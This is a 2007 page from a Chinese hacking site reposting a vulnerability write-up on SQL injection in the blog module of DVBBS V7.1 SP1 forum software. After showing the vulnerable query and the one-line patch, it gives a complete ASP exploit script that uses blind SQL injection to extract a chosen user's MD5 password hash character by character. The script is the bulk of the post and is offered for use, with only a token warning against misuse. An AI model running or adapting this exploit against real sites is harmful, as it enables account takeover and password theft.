文章 | 入侵攻击 | 安全防御 | 操作系统 | 网站建设 | 网络编程 | 路由交换 | 灾难恢复 | 新闻资讯 | 安全公告
下载 | 漏洞扫描 | 加密破解 | 入侵攻击 | 后门木马 | 溢出程序 | 综合工具 | 安全防护 | 原创发布 | 动画教程
论坛 | 黑客军火 | 配服务器 | 黑客情感 | 免费资源 | 美女贴图 | 灌水无罪 | 在线服务 | 会员照片 | 网站首页
 当前位置:主页 >> 安全公告 >> 漏洞公告 >> 文章内容  
 

 
DVBBS V7.1 SP1 Boke注入漏洞

www.hx99.org 阅读: 时间:2007-07-09 整理:华西黑盟
------------------------------------------------------------------
 

作者:execsl
信息来源:邪恶八进制信息安全团队()

刚才在《安全公告》版看到:

动网论坛(DVBBSV7.1SP1)Boke安全更新补丁20060302

信息来源:邪恶八进制信息安全团队()

补丁来源:[Bug.Center.Team-漏洞预警中心小组]
补丁名称:动网论坛(DVBBSV7.1SP1)Boke安全更新补丁20060302
详细说明:
该补丁为[Bug.Center.Team-漏洞预警中心小组]发布,针对DVBBSV7.1SP1Boke程序的安全漏洞所制作的安全更新补丁,压缩包内存在ACCESS和MS_SQL两个版本,因程序影响面广,所以公布安全更新,请使用该版本的用户及时下载或者停止Boke服务,等待官方补丁发布.
Boke程度当中的Cls_Main.asp存在严重的安全漏洞,致使恶意用户可以远程注射网站。DVBBS官方已经更新其漏洞,但没见发布安全补丁。所以此为非官方发布版本。
如有问题,请访问[Bug.Center.Team-漏洞预警中心小组]官方网站咨询。

就自己下载安装DVBBSV7.1SP1
对应一下发现只是在Cls_Main.asp中加入了一句:ArchiveLink=Replace(ArchiveLink,"'","")

ArchiveLink中可提取出BokeName的值

如果不过滤“'”,将会在205行产生注入漏洞,具体代码为

Sql="SelectUserID,UserName,NickName,BokeName,PassWord,BokeTitle,BokeChildTitle,BokeNote,JoinBokeTime,PageView,TopicNum,FavNum,PhotoNum,PostNum,TodayNum,Trackbacks,SpaceSize,XmlData,SysCatID,BokeSetting,LastUpTime,SkinID,Stats,S.S_SkinName,S.S_Path,S.S_ViewPic,S.S_Info,S.S_BuilderFrom[Dv_Boke_User]UInnerJoin[Dv_Boke_Skins]SOnU.SkinID=S.S_ID"
Sql=Lcase(Sql)
IfBokeName<>""Then
Sql=Sql&"whereBokeName='"&BokeName&"'"
ElseIfBokeUserID>0Then
Sql=Sql&"whereUserID="&BokeUserID
Else
'请选取相关的DVBOKE,返回综合列表
ExitSub
EndIf


自己就写了一段ASP代码,自动获得MD5密码,水平有限,高手勿笑。

<br><br>
<br><br>
<br><br>
<center>
<divalign='left'style="width:500px;font-size:12px;">
<%
'==================================================
'
'请将修改为有漏洞的URL
'将admin改为您要读取密码的用户ID
'
'==================================================
Server.ScriptTimeout=300
Response.Buffer=True
Dimhehefulsh
Dimcharhex,OpenURL,templen,tempstr,newgetlen,theoffset,theURL,TheUser
Sethehefulsh=CreateObject("Microsoft.XMLHTTP")
charhex=Split("0,1,2,3,4,5,6,7,8,9,a,b,c,d,e,f",",")
tempstr=""

fortotal=0to15
fortheoffset=0to15
templen=0
OpenURL=""&tempstr&charhex(theoffset)&"'=left(password,"&total+1&")and''='.index.html.index.html"
hehefulsh.Open"Get",OpenURL,False,"",""
hehefulsh.Send
GetPage=BytesToBstr(hehefulsh.ResponseBody)
IfInStr(GetPage,"该博客用户不存在或填写的资料有误!")=0Then
tempstr=tempstr&charhex(theoffset)
response.write"前"&total+1&"位MD5值为:"&tempstr&"其他密码正在读取中,请等待。。。<BR>"
Response.Flush
Exitfor
Endif
Next
Next
response.write"<br><br><br>成功读取密码的MD5值,为:"&tempstr&"<BR><BR><BR>请不要使用本程序进行破坏行为!"
Sethehefulsh=Nothing

FunctionBytesToBstr(body)
dimobjstream
setobjstream=Server.CreateObject("adodb.stream")
objstream.Type=1
objstream.Mode=3
objstream.Open
objstream.Writebody
objstream.Position=0
objstream.Type=2
objstream.Charset="GB2312"
BytesToBstr=objstream.ReadText
objstream.Close
setobjstream=nothing
EndFunction

%>
</div>
</center>

   -------------------------------------------------------------------------------------------
  上一篇:vBulletin is_valid_email()跨站脚本漏洞
  下一篇:Flex创建代码缓冲区溢出漏洞
   -------------------------------------------------------------------------------------------
用户名:
Email:
评论内容:
 
  精品推荐
Discuz! 6.0.0 0Day漏洞
视频语音聊天系统的漏洞
DVBBS 7.1.0 SP1博客远程
bbsxp上传注入漏洞
现代教务管理系统漏洞
MS05-055:Windows内核中
QQ幻想盗号器病毒 窃取游
沸腾新闻系统 V1.1 Access
动网8.0最新漏洞
NSFOCUS 2007年07月之十大
DNS漏洞攻击增多 微软忙着
mssql2005存手工注入漏洞
oblog商业版本4.6注射漏洞
PHPWind论坛5.3版postuplo
百度超级搜霸远程代码执行
DVBBS V7.1 SP1 Boke注入
DedeCMS最新版存在暴物理
QQ惊爆危险漏洞 360截获“
动易最新未公开漏洞
bo-blog2.0.3文件浏览漏洞
宁波都市网漏洞公告(通杀
Microsoft Internet Explo
乔客(joekoe) CMS 4.0 的2
雅虎窗件曝出缓冲区溢出漏
phpRPC库远程代码执行漏洞
关于我们 | 发展历程 | 在线投稿 | 核心监督 | 友情链接 | 网站地图 | 网站留言 | 联系我们
Copyright © 2004-2007 Www.Hx99.Net
版本:华西黑盟网站系统V5.0 Email:root#hx99.org
中国·西安·宝鸡 请使用IE6.0版本, 分辩率1024×768进行浏览
版权所有 任意抄袭 注意完整
陕ICP备06000444号